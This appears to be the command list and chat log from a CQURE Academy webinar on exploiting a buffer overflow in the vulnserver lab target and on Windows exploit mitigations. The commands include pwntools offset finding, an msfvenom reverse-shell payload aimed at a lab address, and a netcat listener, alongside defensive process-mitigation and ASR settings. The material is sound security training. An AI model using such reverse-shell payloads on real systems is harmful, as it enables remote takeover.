Commands used in the video: nc 10.18.10.48 9999 -v python ./fuzz.py python exploit.py import pwn pwn.cyclic(10) pwn.cyclic(100) pwn.cyclic_find( “aaba”) pwn.cyclic_find("aqaa") msfvenom -f python -v shellcode -p windows/shell_reverse_tcp LHOST=10.10.10.60 LPORT=4444 EX ITFUNC=thread -e x86/alpha_upper BufferRegister=esp Get-ProcessMitigation -Name vulnserver.exe Get-ProcessMitigation -Name vulnserver.exe -RunningProcesses Get-ProcessMitigation -RegistryConfigFilePath settings.xml Set-ProcessMitigation -file settings.xml nc -lvp 443 Set-MpPreference -AttackSurfaceReductionRules_Ids D4F94QAB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled ====== Chat log [CQURE] Matus (to All - Entire Audience): 18:34: Hello :) CQURE Academy (to All - Entire Audience): 18:37: Hello everyone. Tomasz J (to All - Entire Audience): 18:54: Good evening Roman D (to All - Entire Audience): 18:54: good morning dirk h (to All - Entire Audience): 18:58: Boa tarde Rafał S (to All - Entire Audience): 19:01: hello Roland J (to All - Entire Audience): 19:01: Hi Robert C (to All - Entire Audience): 19:01: Hello California Robert C (to All - Entire Audience): 19:03: Dont' they call that a Feature :-) Mayank T (to All - Entire Audience): 19:10: the last minute was not audible pl Patrick B (to All - Entire Audience): 19:10: Audio was fine here [CQURE] Matus (to All - Entire Audience): 19:11: All good over here as well, probably just a local problem. Is it better Mayank? Mayank T (to All - Entire Audience): 19:11: magically it came back :) [CQURE] Matus (to All - Entire Audience): 19:11: perfect :) Mayank T (to All - Entire Audience): 19:12: so much would the citirx one cost if gos from POC to full blown exploit ? [CQURE] Matus (to All - Entire Audience): 19:16: It's rather hard to estimate that, you would have to check historical data for similar exploits and estimate based on that. Mayank T (to All - Entire Audience): 19:19: applications written in which language would most probbaly have BOF vulns ? [CQURE] Matus (to All - Entire Audience): 19:23: I would say C/C++ Mayank T (to All - Entire Audience): 19:24: thanks Mayank T (to All - Entire Audience): 19:25: is UAF vulns related here ? Mayank T (to All - Entire Audience): 19:25: ok saw it ... sorry Martin Š (to All - Entire Audience): 19:31: is evolutionary fuzzing related to machine learning? Martin Š (to All - Entire Audience): 19:33: thanks :-) Tyson F (to All - Entire Audience): 19:46: vulnserver window is paused, do to cursor select Mayank T (to All - Entire Audience): 19:46: disable windows firewall maybe :) Tyson F (to All - Entire Audience): 19:46: right click in that window martin l (to All - Entire Audience): 19:47: first ping Tyson F (to All - Entire Audience): 19:47: See that there is "select" in the title bar of the vulserver.exe window. You need to right click in it to get it out of "select text" mode. martin l (to All - Entire Audience): 19:47: telnet 10.10.10.40 9999 Filip Vl (to All - Entire Audience): 19:48: quite embarrasing yet again Mayank T (to All - Entire Audience): 19:48: windows firewall definately Mayank T (to All - Entire Audience): 19:48: ouch :) Daniel B (to All - Entire Audience): 19:50: LOL Welcome to the real world Alessandro R (to All - Entire Audience): 19:50: don't pause the application ! Alessandro R (to All - Entire Audience): 19:50: don't press the mouse click onto the windows Tyson F (to All - Entire Audience): 19:50: white cursor in the window CMD window is causing it to pause. To restore it, left click in that window (get's rid of select cursor). Tyson F (to All - Entire Audience): 19:52: try hitting enter Mayank T (to All - Entire Audience): 20:24: so diff bet thread and porcess in ref to exiting ? [CQURE] Matus (to All - Entire Audience): 20:31: Mayank, do you mean what is the difference between EXITFUNC options in metasploit? Tyson F (to All - Entire Audience): 20:36: If I want to deploy some exploit protection rules, such as disabling the creation of child processes through a script, is there a PowerShell module that contains these? [CQURE] Adrian Denkiewicz (to All - Entire Audience): 20:41: For certain applications there are predefined rules, I think Artur will talk about it in a minute osmo p (to All - Entire Audience): 20:42: do you know on what microsoft licensing level these exploit guards options are available? anything that works below e5? Tyson F (to All - Entire Audience): 20:44: Thank you Matus. Mayank T (to All - Entire Audience): 20:53: sorry matus had to step out... when should exit be via a thread or a process ? Mayank T (to All - Entire Audience): 20:53: why this diff ?